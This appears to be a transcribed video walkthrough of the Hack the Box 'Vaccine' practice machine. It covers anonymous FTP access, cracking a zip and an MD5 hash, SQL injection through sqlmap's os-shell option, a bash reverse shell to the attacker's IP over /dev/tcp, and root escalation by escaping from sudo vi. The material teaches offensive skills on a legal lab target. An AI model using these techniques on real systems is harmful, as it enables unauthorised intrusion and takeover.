Going on YouTube? Today we're going to be taking a look at another tier 2 machine on Hack the Box's starting point. The machine we're going to be taking a look at today is called Vaccine. I was looking around on the forums and a lot of people are having a 302 redirect error as well as getting disconnected from the machine. But the disconnection from the machine is kind of normal, but we're going to work around that 302. So without further ado, go ahead and start up your pwn box, spawn that machine, and get your nmap scan going. While that scan is going, we're going to go ahead and take a look at the first question. Besides SSH and HTTP, what other service is hosted on this box? So let's go ahead and take a look as nmap just finished up. So we have port 21 open, which is your FTP. Port 22 open, which is SSH, and port 80 open, which is HTTP. So the answer to question 1 is FTP. This service can be configured to allow login with any password for a specific username. What is the username? Based on this right here, we got anonymous FTP login is allowed, FTP code 230. So the answer is going to be anonymous, and we'll actually log on here in a second, and it looks like there's going to be a file called backup.zip that we're going to want. So let's go ahead and FTP in. Just pull up my notes so I have the IP address ready at all times. So FTP and then just the IP address of your target machine. And for the name, you're going to want to do anonymous. And then for the password, you could just leave it blank. Alright, so now we're in using FTP, so now we can just list everything in the directory. So just do ls, and we see we do got one file called backup.zip. So let's go ahead and download that using the git command. So we're just going to do git file name, which in this case is backup.zip. And you can see that it did download, so let's go ahead and exit out of FTP now. Switch over here. What is the name of the file downloaded over this service? We just downloaded backup.zip. And we can verify that by just doing ls on our own machine, and we see we got the backup.zip. So what script comes with the John the Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? So that's going to be zip to John, which is actually a really cool script. So zip to John, and then we're going to call it backup. We're using the file name backup.zip, or using the file. And then we're going to send that over using the greater than symbol to, we'll just call it zip.hashes. It's just a file that's going to store the hash that we get. Alright. So the answer to this one was zip to John. What is the password for the admin user on the website? We actually don't know that yet. So we got the hash from the zip file. So now we're going to send that over to John the Ripper using John zip.hashes, and you can use tac-tac-show to show any passwords it finds. So it says one password hash cracked, and you can see right here backup.zip, and there's our password. So now we can go ahead and unzip the file, unzip backup.zip, enter, and it's going to ask us for the password we just found, 741-852-963. And now we go ls, and you can see it did unzip. So now we have two files, index.php and style.css. So let's go ahead and check out the index.php and see if we can find anything. We're going to go ahead and use cat index.php, and we'll just scroll through here, see if we find anything. Pull up my notes. Alright, so we have a username of admin. Looks like MD5 of this right here. Copy that over to the notes. So now we have an MD5. What we can do is just go to md5decrypt.net, as this should be pretty quick, and go ahead and click decrypt. And it shows our admin password is QWERTY789. So that should be the answer for this one. What option can be passed to SQL map to try to get command execution via the SQL injection? So we're not quite there yet. We just got the username and password. Write that down here. So let's go ahead and open up Burp Suite. This is how I managed to bypass that 302 redirect I was getting with SQL map. So let's go ahead and open up the browser. And then we're going to navigate to that IP address. And once we're navigated there, we're going to go ahead and log in using admin and then QWERTY789. And we're going to go ahead and sign in. All right, so Megacorp car catalog. So we have a search function here and it looks like a list. So we can go ahead and do a apostrophe. And you can see that it does look like it might be vulnerable. So now let's just go ahead and just do AAA. Search that. Nothing came up, but we go over here to our Burp Suite. Under proxy, go to HTTP history. And just scroll through here looking for that search function. So we did search AAA. And this is what we're going to use right here, this GET request. So we're going to copy that. Go back over to your terminal. I'm just going to clear it so it's easier to read. And I'm going to create a file using nano. And we'll call it burp.get. And we're going to go ahead and paste that information I just copied over into here. So right here is showing our get using the search. So we're going to search equals AAA. And then down here is the cookie, which before I was using this method, I was inputting the URL and the cookie separately into SQL map. And I was getting that 302 redirect. And so far this method seemed to be pretty solid. So go ahead and save this. Alright guys, now that we got the burp.get, we can use SQL map, tac r burp.get, tac os tac shell, since we know it's vulnerable to injection via the search. Go ahead and let that run. And we actually have an OS shell now. So let's go over here. And then we'll go ahead and open up a netcat. OBNP. I'm going to open mine on port 1234, but you can open yours on whatever port you choose. Alright, so now this, you're just going to have to use, I had to copy this from Google. Get my, don't want that one. So it's TCP or TCP / your IP address. You can find that using ifconfig under the tune0 / and then the port number we're using. I'm using port 1234. So it's bash tac c quote bash tac I greater than and /dev /tcp / your IP address that's under tune0 / port number 0 greater than and 1. So now we'll go ahead and hit enter. Just choose yes here. SQL is going to retry the request, and you can see that it kind of froze here. So we go over here and we actually do have access under the Postgres. All right. So now what we can do is Python 3. You should remember this from a lot of the others. Import pty semicolon pty.spawn /bin /bash quote boom. Okay. So now let's just go ahead and cd ls cat user.text. All right, so we'll grab this real quick. So user.text. Cool. So now we're going to navigate to cd.ls cd www ls cd html. All right, so we got dashboard.php, index.php. So let's go ahead and check out the dashboard.php file. Scroll through here, see if there's anything good. Mega Corp car catalog. All right, here we go. Database name, cars database user. So we got a user Postgres password key capital P at symbol S 5W 0RD. There we go. Postgres. All right, so now what we can do here is just go ahead and exit out. And then come over here. And what we're going to do now is, because we do have port 22 open, which is SSH, let's go ahead and try an SSH in. It'll make it a little bit more stable, as I kept getting booted last time I was trying to do this. Click yes. It's asking for that password we just found, which is capital P at S5W0RD exclamation point. All right, so we have access here. So now do sudo tac l, type in that password again, PA5W0RD. All right, so using sudo tac l, it shows that we have root on bin v. Postgres. All right, so now we should be able to just do sudo bin/v. I said root, but I meant sudo Postgres SQL/11/main/ what was it? pg_hba.conf. sudo/bin/v space etc/postgresql/21/main/pg_hba. All right, so now we can go over here to GTFO bins. And we have access via VI, so we'll scroll down. Probably do a search of this too, it'd be a lot faster, but we want sudo. So we get our shell here, and all we have to do is type in this here, and then this here should give us the shell. So I just do set shell equals /bin/sh. All right, and then do shell. All right, so now we have a pound sign, so we can do who am I, and it shows that we are root. So let's go over here, see if we got any questions we got to answer. What option can be passed to SQL map to try to get command execution via the SQL injection? That's going to be your tac OS tac shell. What program can the Postgres user run as root using sudo? We just did that. That was VI. So submit the user flag. So we'll go ahead and grab the user flag real quick. Copy that over. And then now we just need to pull the root flag, which we are root now, so we just got to find it. So we could do cd tilde and then ls, and we see we got root.text, so we'll just do cat root.text. Then we can copy this on over. Root.text. And then you're all done. Alright guys, so that was the vaccine machine on Hack the Box starting point tier 2. This way I found reliably bypasses the 302 redirect, and using SSH bypasses getting booted. If you have any questions, feel free to post them down below, or if you have any other ways you do it, feel free to let me know. I do like to learn new things. Alright guys, have a good one, and see you next time.